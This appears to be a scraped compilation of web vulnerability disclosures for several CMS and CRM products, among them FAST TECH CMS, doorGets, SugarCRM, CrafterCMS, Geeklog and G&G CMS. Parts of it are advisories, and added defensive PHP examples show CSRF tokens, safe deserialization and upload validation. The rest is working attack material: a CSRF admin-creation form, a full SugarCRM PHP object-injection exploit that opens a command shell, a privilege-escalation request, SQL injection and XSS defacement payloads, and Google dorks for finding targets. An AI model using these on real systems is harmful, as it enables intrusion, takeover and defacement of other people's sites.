<pre><code>====================================================================================================================================<br />| # Title : FAST TECH CMS v1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français (Pro) / browser : Mozilla Firefox 73.0.1 (32-bit) |<br />| # Vendor : http://www.fasttechtechnologies.in/ |<br />| # Dork : Designed & Developed by FAST TECH TECHNOLOGIES SERVICES PVT LTD . All rights reserved. |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] The following HTML code creates a new admin.<br /><br />[+] Go to line 5.<br /><br />[+] Set the target site link, save changes and apply.<br /><br />[+] Infected file : /admin/add_new_user.php<br /><br />[+] Save the code as poc.html.<br /><br /><!DOCTYPE html><br /><html xmlns="http://www.w3.org/1999/xhtml"><br /><head profile="http://www.w3.org/2005/10/profile"></head><br /><body><br /><form action="https://127.0.0.1/repairthikanacom/admin/add_new_user.php" method="post" name="newuserform" enctype="multipart/form-data"><br /> <div class="form-group"><br /> <label>Name</label><br /> <input type="text" class="form-control" id="name" name="name" placeholder="Enter Name ..." required><br /> </div><br /> <div class="form-group"><br /> <label>User Name</label><br /> <input type="text" class="form-control" id="username" name="username" placeholder="Enter User Name ..." required><br /> </div><br /> <div class="form-group"><br /> <label>Password</label><br /> <input type="password" class="form-control" id="password" name="password" placeholder="Enter Password ..." required><br /> </div><br /> <div class="form-group"><br /> <label>Confirm Password</label><br /> <input type="password" class="form-control" id="confirmpassword" name="confirmpassword" placeholder="Enter Confirm Password ..." required><br /> </div><br /> <div class="form-group"><br /> <label>User Type</label><br /> <select class="form-control" id="usertype" name="usertype" required><br /> <option>Select Type</option><br /> <option value="A">Administrator</option><br /> <option value="R">Retail</option><br /> </select><br /> </div><br /> <div class="form-group"><br /> <label>Email-Id</label><br /> <input type="text" class="form-control" id="emailid" name="emailid" placeholder="Enter Email-Id ..." required><br /> </div><br /> <div class="box-footer"><br /> <button type="submit" class="btn btn-primary" name="submit">Submit</button><br /> </div><br /></form><br /></body><br /></html><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
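The defender's side of the issue above, as an added example that is not FAST TECH CMS code: an "add new user" handler that refuses a cross-site POST like the PoC form. Field names follow the form; the session options, the admin-session requirement and the save_user() call are assumptions.

```php
<?php
// Added example, not FAST TECH CMS code: a CSRF-protected handler for an
// "add new user" page such as /admin/add_new_user.php. Field names follow the
// PoC form; session options and the save step are assumptions.
declare(strict_types=1);

session_start([
    'cookie_httponly' => true,
    'cookie_secure'   => true,
    'cookie_samesite' => 'Strict', // cross-site POSTs arrive without the session cookie
]);

/** Per-session synchronizer token, created on first use. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Constant-time comparison of the submitted token with the session copy. */
function csrf_token_is_valid($submitted): bool
{
    return is_string($submitted)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

/** Defence in depth: the Origin (or Referer) of a browser POST must be our own host. */
function request_is_same_origin(string $ownHost): bool
{
    $origin = $_SERVER['HTTP_ORIGIN'] ?? $_SERVER['HTTP_REFERER'] ?? '';
    return $ownHost !== '' && $origin !== '' && parse_url($origin, PHP_URL_HOST) === $ownHost;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $ownHost = (string) strtok($_SERVER['HTTP_HOST'] ?? '', ':'); // drop any :port
    if (!csrf_token_is_valid($_POST['csrf_token'] ?? null) || !request_is_same_origin($ownHost)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token.');
    }
    // An authenticated admin session is assumed to have been verified before this point.
    if (($_POST['password'] ?? '') === '' || $_POST['password'] !== ($_POST['confirmpassword'] ?? '')) {
        exit('Passwords are empty or do not match.');
    }
    $hash = password_hash($_POST['password'], PASSWORD_DEFAULT);
    // save_user($_POST['name'], $_POST['username'], $hash, $_POST['usertype'], $_POST['emailid']); // assumed storage call
    exit('User created.');
}

// GET: render the form with the hidden token. The PoC form carries no such
// field, so its forged POST is refused by the check above.
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
echo '<form method="post" action="add_new_user.php">',
     '<input type="hidden" name="csrf_token" value="', $token, '">',
     '<input type="text" name="username" required> ',
     '<input type="password" name="password" required> ',
     '<input type="password" name="confirmpassword" required> ',
     '<button type="submit" name="submit">Submit</button></form>';
```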
<pre><code>====================================================================================================================================<br />| # Title : doorGets CMS v12 Unrestricted File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français (Pro) / browser : Mozilla Firefox 65.0 (32-bit) |<br />| # Vendor : https://doorgets.io/t/en/ |<br />| # Dork : "Powered with doorGets ™" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Register a new user : http://127.0.0.1/bestwayschoolcom/dg-user/en/?controller=authentification&action=register<br /><br />[+] Follow the confirmation link in the email.<br /><br />[+] After login, go to manage your profile : http://127.0.0.1/elimu7com/eXplored/dg-user/en/?controller=account<br /><br />[+] From parameters, choose an HTML editor (editor: TinyMCE) and press Save.<br /><br />[+] Create a new blog : http://target_site/eXplored/dg-user/en/?controller=moduleblog&uri=blog&action=add<br /><br />[+] Insert your Ev!l .php2 / .html / .svg ... file.<br /><br />[+] http://target_site/fileman/Uploads/<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>---------------------------------------------------------------------------<br />CrafterCMS <= 4.0.2 Multiple Reflected Cross-Site Scripting Vulnerabilities<br />---------------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://craftercms.org<br /><br /><br />[-] Affected Versions:<br /><br />Version 4.0.2 and prior versions.<br />Version 3.1.27 and prior versions.<br /><br /><br />[-] Vulnerabilities Description:<br /><br />There are multiple Reflected Cross-Site Scripting vulnerabilities affecting CrafterCMS.<br />The vulnerabilities exist in every API endpoint that reflects some input parameter and produces XML responses. Following are some examples:<br /><br />• /api/1/site/url/transform - url and transformerName parameters are affected<br />• /api/1/site/content_store/children - url parameter is affected<br />• /api/1/site/content_store/item - url parameter is affected<br /><br /><br />[-] Solution:<br /><br />Upgrade to version 4.0.3, 3.1.28, or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[22/11/2022] - Vendor notified<br />[24/03/2023] - Fixed versions released<br />[03/08/2023] - CVE number assigned<br />[23/08/2023] - Publication of this advisory<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2023-4136 to these vulnerabilities.<br /><br /><br />[-] Credits:<br /><br />Vulnerabilities discovered by Egidio Romano, working with IMQ Minded Security.<br /><br /><br />[-] Original Advisory:<br /><br />https://karmainsecurity.com/KIS-2023-09<br /><br /><br />[-] Other References:<br /><br />https://docs.craftercms.org/en/4.1/security/advisory.html#cv-2023080301<br /><br /></code></pre>
<pre><code>----------------------------------------------------<br />SugarCRM <= 12.2.0 Two SQL Injection Vulnerabilities<br />----------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://www.sugarcrm.com<br /><br /><br />[-] Affected Versions:<br /><br />Version 12.2.0 and prior versions.<br />Version 12.0.2 and prior versions.<br />Version 11.0.5 and prior versions.<br /><br /><br />[-] Vulnerabilities Description:<br /><br />1) User input passed through the “metrics” parameter to the “/Forecasts/metrics” REST API endpoint is not properly sanitized before being used to construct a SQL query. This can be exploited by malicious users to e.g. read sensitive data from the database through in-band SQL Injection attacks.<br /><br />2) User input passed through the “placeholder_fields” parameter to the e.g. “/Notes/{recordID}/link/history” REST API endpoint is not properly sanitized before being used to construct a SQL query. This can be exploited by malicious users to e.g. read sensitive data from the database through in-band SQL Injection attacks.<br /><br /><br />[-] Proof of Concept:<br /><br />https://karmainsecurity.com/pocs/CVE-2023-35811_1.php<br />https://karmainsecurity.com/pocs/CVE-2023-35811_2.php<br /><br /><br />[-] Solution:<br /><br />Upgrade to version 12.3.0, 12.0.3, 11.0.6, or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[14/02/2023] - Vendor notified<br />[12/04/2023] - Fixed versions released<br />[17/06/2023] - CVE number assigned<br />[23/08/2023] - Publication of this advisory<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2023-35811 to these vulnerabilities.<br /><br /><br />[-] Credits:<br /><br />Vulnerabilities discovered by Egidio Romano.<br /><br /><br />[-] Original Advisory:<br /><br />https://karmainsecurity.com/KIS-2023-08<br /><br /><br />[-] Other References:<br /><br />https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-008/<br /><br /></code></pre>
<pre><code>-------------------------------------------------------------------------------<br />SugarCRM <= 12.2.0 (Docusign_GlobalSettings) PHP Object Injection Vulnerability<br />-------------------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://www.sugarcrm.com<br /><br /><br />[-] Affected Versions:<br /><br />Version 12.2.0 and prior versions.<br />Version 12.0.2 and prior versions.<br />Version 11.0.5 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />There is a Second-Order PHP Object Injection vulnerability which might allow malicious admin users to execute arbitrary PHP code on the web server (RCE) by storing malicious serialized objects into the database.<br /><br />The vulnerability can be triggered by invoking the "/DocuSign/getGlobalConfig" REST API endpoint, which is using the unserialize() PHP function with the "Docusign_GlobalSettings" parameter.
This can be exploited to inject arbitrary PHP objects into the application scope, allowing an attacker to perform a variety of attacks.<br /><br /><br />[-] Proof of Concept:<br /><br />https://karmainsecurity.com/pocs/CVE-2023-35810.php<br /><br />[Packet Storm Note: see below]<br /><br />[-] Solution:<br /><br />Upgrade to version 12.3.0, 12.0.3, 11.0.6, or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[14/02/2023] - Vendor notified<br />[12/04/2023] - Fixed versions released<br />[17/06/2023] - CVE number assigned<br />[23/08/2023] - Publication of this advisory<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2023-35810 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Original Advisory:<br /><br />https://karmainsecurity.com/KIS-2023-07<br /><br /><br />[-] Other References:<br /><br />https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-009/<br /><br /><br /><br />---- poc ----<br /><br /><?php<br /><br />set_time_limit(0);<br />error_reporting(E_ERROR);<br /><br />if (!extension_loaded("curl")) die("[-] cURL extension required!\n");<br /><br />if ($argc != 4) die("Usage: php $argv[0] <URL> <username> <password>\n");<br /><br />include("chain.php");<br /><br />function inject_pop_chain($cmd)<br />{<br /> global $ch, $url;<br /><br /> $pop = new \Monolog\Handler\BufferHandler(["current", "system"], [$cmd, "level" => null]);<br /> $pop = new \Monolog\Handler\SyslogUdpHandler($pop);<br /> $pop = base64_encode(serialize($pop));<br /><br /> curl_setopt($ch, CURLOPT_URL, "{$url}rest/v11_18/Administration/config/Docusign");<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, '{"Docusign_GlobalSettings":"'.$pop.'"}');<br /><br /> curl_exec($ch);<br />}<br /><br />list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];<br /><br />print "[+] Logging in with username '{$user}' and password '{$pass}'\n";<br /><br />$ch = curl_init();<br /><br />$params = ["username" => $user, "password" => $pass, "grant_type" => "password", "client_id" => "sugar"];<br /><br />curl_setopt($ch, CURLOPT_URL, "{$url}rest/v11_18/oauth2/token");<br />curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($params));<br />curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]);<br />curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br />curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);<br /><br />if (($token = (json_decode(curl_exec($ch)))->access_token) == null) die("[+] Login failed!\n");<br /><br />curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json", "OAuth-Token: {$token}"]);<br /><br />print "[+] Launching shell\n";<br /><br />while(1)<br />{<br /> print "\nsugar-shell# ";<br /> if (($cmd = trim(fgets(STDIN))) == "exit") break;<br /> inject_pop_chain($cmd);<br /> curl_setopt($ch, CURLOPT_URL, "{$url}rest/v11_18/DocuSign/getGlobalConfig");<br /> curl_setopt($ch, CURLOPT_POST, false);<br /> preg_match("/(.+)/s", curl_exec($ch), $m) ? print $m[1] : die("\n[+] Exploit failed!\n");<br />}<br /><br />// cleaning<br />curl_setopt($ch, CURLOPT_URL, "{$url}rest/v11_18/Administration/config/Docusign");<br />curl_setopt($ch, CURLOPT_POSTFIELDS, '{"Docusign_GlobalSettings":""}');<br /><br />curl_exec($ch);<br /><br /></code></pre>
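How the unserialize() call described above can be made safe, as an added example that is not SugarCRM code: the stored blob is decoded with allowed_classes=false, refused outright if it carries object records, and shown beside a JSON alternative. Function names, the settings keys and the constructed blobs are assumptions.

```php
<?php
// Added example, not SugarCRM code: reading back a stored setting such as the
// "Docusign_GlobalSettings" blob without handing it to an unrestricted
// unserialize(). Function names and the settings keys are assumptions.
declare(strict_types=1);

/**
 * Decode a settings blob that must be a plain array of scalars.
 * No class is ever instantiated: allowed_classes=false turns every "O:" record
 * into __PHP_Incomplete_Class, and the checks below reject it anyway.
 */
function loadGlobalSettings(string $stored): array
{
    if ($stored === '') {
        return [];
    }
    // Cheap pre-check on the wire format: a settings blob is an array ("a:N:{")
    // and never carries object ("O:") or custom-serialized ("C:") records.
    // A string value that happens to contain ';O:1:"' is refused too; acceptable here.
    if (!preg_match('/^a:\d+:\{/', $stored) || preg_match('/(^|[;{])[OC]:\d+:"/', $stored)) {
        throw new InvalidArgumentException('Settings blob carries object records; refusing to load.');
    }
    $data = unserialize($stored, ['allowed_classes' => false]);
    if (!is_array($data)) {
        throw new InvalidArgumentException('Settings blob is not an array.');
    }
    array_walk_recursive($data, static function ($value): void {
        if (is_object($value)) { // __PHP_Incomplete_Class would land here
            throw new InvalidArgumentException('Unexpected object inside settings.');
        }
    });
    return $data;
}

/** Preferred for new code: JSON has no way to express a PHP object at all. */
function saveGlobalSettings(array $settings): string
{
    return json_encode($settings, JSON_THROW_ON_ERROR);
}

function loadGlobalSettingsJson(string $stored): array
{
    $data = $stored === '' ? [] : json_decode($stored, true, 8, JSON_THROW_ON_ERROR);
    return is_array($data) ? $data : [];
}

// Constructed inputs: a legitimate blob and one carrying an object record
// (a harmless stdClass stands in for a gadget chain).
$legit = serialize(['enabled' => true, 'account_id' => 'demo-account']);
$bad   = 'a:1:{s:1:"x";O:8:"stdClass":0:{}}';

var_dump(loadGlobalSettings($legit));
try {
    loadGlobalSettings($bad);
} catch (InvalidArgumentException $e) {
    echo 'Rejected: ', $e->getMessage(), PHP_EOL;
}
var_dump(loadGlobalSettingsJson(saveGlobalSettings(['enabled' => false])));
```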
<pre><code>------------------------------------------------------------------------<br />SugarCRM <= 12.2.0 (updateGeocodeStatus) Bean Manipulation Vulnerability<br />------------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://www.sugarcrm.com<br /><br /><br />[-] Affected Versions:<br /><br />Version 12.2.0 and prior versions.<br />Version 12.0.2 and prior versions.<br />Version 11.0.5 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />The vulnerability is exploitable through the "/maps/updateGeocodeStatus" REST API endpoint. This might allow a malicious user to modify arbitrary Sugar Beans, and that could lead to a variety of security impacts, such as Privilege Escalation attacks by sending an HTTP request like the following:<br /><br />POST /rest/v11_17/maps/updateGeocodeStatus HTTP/1.1<br />Host: sugarcrm_website<br />Content-Type: application/json<br />OAuth-Token: d4cd573b-3b24-44ae-8eab-6d3b525f7974<br />Content-Length: 96<br />Connection: close<br /><br />{"id":"[USER_ID]","module":"Users","fieldName":"is_admin","status":1}<br /><br /><br />[-] Solution:<br /><br />Upgrade to version 12.3.0, 12.0.3, 11.0.6, or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[14/02/2023] - Vendor notified<br />[12/04/2023] - Fixed versions released<br />[17/06/2023] - CVE number assigned<br />[23/08/2023] - Publication of this advisory<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2023-35809 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2023-06<br /><br /><br />[-] Other References:<br /><br />https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-007/<br /><br /></code></pre>
<pre><code>-----------------------------------------------------------------<br />SugarCRM <= 12.2.0 (Notes) Unrestricted File Upload Vulnerability<br />-----------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://www.sugarcrm.com<br /><br /><br />[-] Affected Versions:<br /><br />Version 12.2.0 and prior versions.<br />Version 12.0.2 and prior versions.<br />Version 11.0.5 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />When handling the "save" action within the "Notes" module the application allows uploading of any kind of file into the /upload/ directory. This one is protected by the main SugarCRM .htaccess file, i.e. it doesn't allow access/execution for PHP files. However, this behaviour can be overridden if a subdirectory contains another .htaccess file. So, an attacker can leverage the vulnerability to firstly upload a new .htaccess file and then to upload the PHP code they want to execute.<br /><br /><br />[-] Proof of Concept:<br /><br />https://karmainsecurity.com/pocs/CVE-2023-35808.php<br /><br /><br />[-] Solution:<br /><br />Upgrade to version 12.3.0, 12.0.3, 11.0.6, or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[14/02/2023] - Vendor notified<br />[12/04/2023] - Fixed versions released<br />[17/06/2023] - CVE number assigned<br />[23/08/2023] - Publication of this advisory<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2023-35808 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2023-05<br /><br /><br />[-] Other References:<br /><br />https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-006/<br /><br /></code></pre>
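Server-side upload validation that closes both upload paths on this page, the doorGets one (.php2 / .html / .svg through the editor) and the SugarCRM Notes one (.htaccess first, PHP second), as an added example that is not either project's code. The extension allowlist, the storage directory and the constructed PNG are assumptions.

```php
<?php
// Added example, not doorGets or SugarCRM code: checks an upload handler can
// apply before writing a file. Covers dotfiles such as .htaccess, alternate
// PHP extensions such as .php2, and active content such as .html/.svg.
declare(strict_types=1);

// Assumed allowlist: extension => MIME type libmagic must report for the content.
const ALLOWED_EXTENSIONS = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif', 'pdf' => 'application/pdf'];

/**
 * Return the safe storage name for an upload, or null when it must be rejected.
 * $clientName is the user-supplied name; $tmpPath the received file on disk.
 */
function validateUpload(string $clientName, string $tmpPath): ?string
{
    $base = basename($clientName);
    // 1. No dotfiles: an uploaded .htaccess can re-enable PHP execution in its directory.
    if ($base === '' || $base[0] === '.') {
        return null;
    }
    // 2. Every dotted segment must be an allowed extension, so "x.php2" and
    //    "shell.php.png" are both refused (Apache may honour an earlier segment
    //    when it does not recognise the last one).
    $parts = array_map('strtolower', explode('.', $base));
    array_shift($parts); // drop the stem
    if ($parts === [] || array_diff($parts, array_keys(ALLOWED_EXTENSIONS)) !== []) {
        return null;
    }
    $ext = end($parts);
    // 3. Content must match the claimed type: magic bytes, not the client's Content-Type.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($tmpPath) !== ALLOWED_EXTENSIONS[$ext]) {
        return null;
    }
    // 4. Never keep the client's name: random stem, one known extension.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

/** Store outside DocumentRoot; a listable directory like /fileman/Uploads/ should not exist. */
function storeUpload(string $tmpPath, string $safeName, string $storageDir): string
{
    $dest = rtrim($storageDir, '/') . '/' . $safeName;
    if (!move_uploaded_file($tmpPath, $dest)) {
        throw new RuntimeException('could not store upload');
    }
    return $dest;
}

// Constructed demonstration: a minimal PNG (signature + IHDR) under several names.
$tmp = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($tmp, "\x89PNG\r\n\x1a\n" . "\0\0\0\x0dIHDR" . "\0\0\0\x01\0\0\0\x01\x08\x02\0\0\0" . "\0\0\0\0");
foreach (['photo.png', '.htaccess', 'shell.php2', 'page.html', 'logo.svg', 'x.php.png'] as $name) {
    printf("%-12s => %s\n", $name, validateUpload($name, $tmp) ?? 'rejected');
}
unlink($tmp);
```

Only photo.png passes; the other five names are refused before any content check runs, so a second .htaccess can never reach the upload directory.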
<pre><code>====================================================================================================================================<br />| # Title : GEN Security+ v4.0 SQL Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français (Pro) / browser : Mozilla Firefox 63.0.3 (32-bit) |<br />| # Vendor : https://www.ptcpay.com/ |<br />| # Dork : Powered by GeN4 Security+ 2.0 |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] http://127.0.0.1/GEN/forum/main_forum.php?cat=1 (inject here)<br /><br />[+] Login : http://127.0.0.1/GEN/admin/<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Geeklog v2.1.0b1 Database Disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français (Pro) / browser : Mozilla Firefox 63.0.3 (32-bit) |<br />| # Vendor : http://www.geeklog.net/ |<br />| # Dork : Powered by Geeklog |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Suffers from a database disclosure vulnerability that allows visitors to obtain the site manager information.<br /><br />[+] Use payload : /admin/install/configinfo.php<br /><br />[+] http://127.0.0.1/public_html/admin/install/configinfo.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : G&G Corporate CMS v1.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français (Pro) / browser : Mozilla Firefox 66.0.2 (32-bit) |<br />| # Vendor : http://gegweb.it |<br />| # Dork : intext:Powered by Studio G&G Corporate Communication site:it |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Use payload : /prodotti.php?LANG=2&id=prodotti&CAT=1'<marquee><font color=lime size=32>Hacked by indoushka</font></marquee><br /><br />[+] http://priolinoxit/prodotti.php?LANG=2&id=prodotti&CAT=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>